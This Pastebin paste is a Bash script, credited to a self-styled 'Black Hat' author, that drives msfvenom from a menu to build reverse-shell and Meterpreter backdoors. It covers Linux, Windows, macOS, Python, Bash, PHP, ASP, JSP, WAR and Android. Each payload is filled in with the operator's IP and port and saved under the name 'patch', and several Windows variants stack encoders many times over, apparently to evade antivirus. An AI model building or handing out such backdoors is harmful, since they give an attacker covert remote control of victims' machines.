Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- ############
- # FUNCAO 1 #
- ############
- # Apresentacao
- apresentacao()
- {
- clear
- printf " \e[1;92m.-\"\"\"\"-. \e[0m\n"
- printf " \e[1;92m/ \ \e[0m\n"
- printf " \e[1;77m \e[0m\e[1;92m/_ _\ \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m// \ / \\ \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m|\__\ /__/ \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m\ || / \e[0m\n"
- printf "\e[1;77m \e[0m\e[1;92m\ / \e[0m\n"
- printf "\e[1;92m \e[0m \e[1;92m\ __ / \e[0m\n"
- printf " \e[1;92m'.__.' \e[0m\n\n"
- echo -e "\033[01;33m###################################\033[01;37m"
- echo -e "\033[01;32m Desenvolvido por DarProgrammer000\033[01;37m"
- echo -e "\033[31;5m Black Hat DarkProgrammer000\033[0m"
- echo -e "\033[01;33m##################################\033[01;37m"
- echo -e "\033[01;31m \n# AVISO !! MsfConsole \033[00;37m"
- echo -e "\033[01;32m# -1-> use exploit/multi/handler \033[00;37m"
- echo -e "\033[01;33m# -2-> set payload ???/meterpreter/reverse_tcp\033[00;37m"
- echo -e "\033[01;34m# -2-> set payload cmd/unix/reverse_???_ssl \033[00;37m"
- echo ""
- }
- # Mensagem
- msg()
- {
- # Estrutura de decisao + error_level
- if (($?==0))
- then
- # Mensagem
- echo -e "\033[32;5m\n*** Sucesso ***\033[0m"
- echo -e "\033[32;5m\n<< ENTER >>> \033[0m"
- read
- else
- echo -e "\033[31;5m\n*** ERRO ***\033[0m"
- echo -e "\033[31;5m\n<< ENTER >>> \033[0m"
- read
- fi
- }
- ############
- # FUNCAO 2 #
- ############
- # Entrada de dados
- dados()
- {
- # Apresentacao
- while ((1))
- do
- # Apresentacao
- echo ""
- echo -e "\033[01;31m-------------------\033[01;37m"
- echo -e "\033[01;31m# [1] IP interno \033[01;37m"
- echo -e "\033[01;32m# [2] IP externo \033[01;37m"
- echo -e "\033[01;31m-------------------\033[01;37m"
- echo -e -n "\033[01;35m\n* Opc.: \033[01;37m"
- read ip
- if ((ip==1))
- then
- lhost=$(hostname -I | awk '{print $1}')
- break
- elif ((ip==2))
- then
- lhost=$(curl ifconfig.me/ip --silent)
- break
- else
- clear
- continue
- fi
- done
- # Controle
- echo -e -n "\033[01;32m\n# LHOST: $lhost\033[01;37m"
- echo -e -n "\033[01;32m\n# LPORT: \033[01;37m"
- read lport
- echo -e "\033[01;35m\n-.-.-.-.-.-.-.-.-.-.- Loading -.-.-.-.-.-.-.-.-.-.-\033[01;37m"
- }
- # Arquivos executaveis
- binaries()
- {
- while ((1))
- do
- # Apresentacao
- clear
- echo -e "\033[31;5m---------- BINARIES ----------\033[0m"
- echo -e "\033[01;31m# [1] Linux \033[01;37m"
- echo -e "\033[01;32m# [2] Windows (encoder) \033[01;37m"
- echo -e "\033[01;32m# [3] Windows (superEncoder) \033[01;37m"
- echo -e "\033[01;32m# [4] Windows (https) \033[01;37m"
- echo -e "\033[01;33m# [5] Mac \033[01;37m"
- echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
- read opc
- # Estrutura de decisao: Protecao de menu
- if ((opc > 0 && opc < 6))
- then
- # Chamada de funcao
- dados
- case $opc in
- 1) msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f elf > patch.elf && break;;
- 2) msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -b "\x00" -e x86/shikata_ga_nai -f exe > patch.exe && break;;
- 3) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw -e x86/shikata_ga_nai -i 9 | \
- msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 11 -f raw | \
- msfvenom -a x86 --platform windows -e x86/countdown -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 7 -f exe > patch.exe && break;;
- 4) msfvenom -p windows/meterpreter/reverse_https LHOST=$lhost LPORT=$lport -e x86/shikata_ga_nai -i 20 -f exe > patch.exe && break;;
- 5) msfvenom -p osx/x86/shell_reverse_tcp LHOST=$lhost LPORT=$lport -f macho > patch.macho && break;;
- esac
- else
- continue
- fi
- done
- # Chamada de funcao
- msg
- }
- # Arquivos em script
- script()
- {
- while ((1))
- do
- # Apresentacao
- clear
- echo -e "\033[31;5m---------- LINUX ----------\033[0m"
- echo -e "\033[01;31m# [1] Python \033[01;37m"
- echo -e "\033[01;32m# [2] Bash \033[01;37m"
- echo -e -n "\033[01;34m\n- Opc.: \033[01;37m"
- read opc
- # Estrutura de decisao: Protecao de menu
- if ((opc > 0 && opc < 3))
- then
- # Chamada de funcao
- dados
- case $opc in
- 1) msfvenom -p python/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.py && break;;
- #1) msfvenom -p cmd/unix/reverse_python LHOST=$lhost LPORT=$lport -f raw > patch.py && break;;
- #1) msfvenom -p cmd/unix/reverse_python_ssl LHOST=$lhost LPORT=$lport -f raw > patch.py;;
- 2) msfvenom -p cmd/unix/reverse_bash LHOST=$lhost LPORT=$lport -f raw > patch.sh && break;;
- *) continue;;
- esac
- else
- continue
- fi
- done
- # Chamada de funcao
- msg
- }
- # Arquivos de servidores
- web()
- {
- while ((1))
- do
- # Apresentacao
- clear
- echo -e "\033[31;5m---------- WEB ---------\033[0m"
- echo -e "\033[01;31m# [1] PHP \033[01;37m"
- echo -e "\033[01;32m# [2] ASP \033[01;37m"
- echo -e "\033[01;33m# [3] JSP \033[01;37m"
- echo -e "\033[01;34m# [4] WAR \033[01;37m"
- echo -e -n "\033[01;35m\n- Opc.: \033[01;37m"
- read opc
- # Estrutura de decisao: Protecao de menu
- if ((opc > 0 && opc < 5))
- then
- # Chamada de funcao
- dados
- case $opc in
- 1) msfvenom -p php/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.php && break;;
- 2) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport -f asp > patch.asp && break;;
- 3) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f raw > patch.jsp && break;;
- 4) msfvenom -p java/jsp_shell_reverse_tcp LHOST=$lhost LPORT=$lport -f war > patch.war && break;;
- *) continue;;
- esac
- else
- continue
- fi
- done
- # Chamada de funcao
- msg
- }
- # Arquivos em script
- apk()
- {
- # Apresentacao
- clear
- echo -e "\033[31;5m---------- ANDROID ----------\033[0m"
- # Chamada de funcao
- dados
- # Comando
- msfvenom -p android/meterpreter/reverse_tcp LHOST=$lhost LPORT=$lport > patch.apk
- # Chamada de funcao
- msg
- }
- # Programa
- programa()
- {
- # Apresentacao
- while ((1))
- do
- apresentacao
- echo -e "\033[01;37m---------- BACKDOOR (MSF VENOM) ----------\033[01;37m"
- echo -e "\033[01;31m# [1] BINARIES \033[01;37m"
- echo -e "\033[01;32m# [2] SCRIPT \033[01;37m"
- echo -e "\033[01;33m# [3] WEB \033[01;37m"
- echo -e "\033[01;34m# [4] APK \033[01;37m"
- echo -e "\033[01;35m# [0] Sair \n\033[01;37m"
- echo -e -n "\033[01;36m- Opc.: \033[01;37m"
- read opc
- case $opc in
- 1) binaries;;
- 2) script;;
- 3) web;;
- 4) apk;;
- 0) break;;
- *) continue;;
- esac
- done
- }
- # Execucao do programa
- programa
- # -> Descomente as linhas abaixo caso queria iniciar automaticamente:
- # Iniciar servidor postgresql
- # /etc/init.d/postgresql restart
- # Abrir outro terminal execuntado MSFCONSOLE
- # gnome-terminal -- msfconsole
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement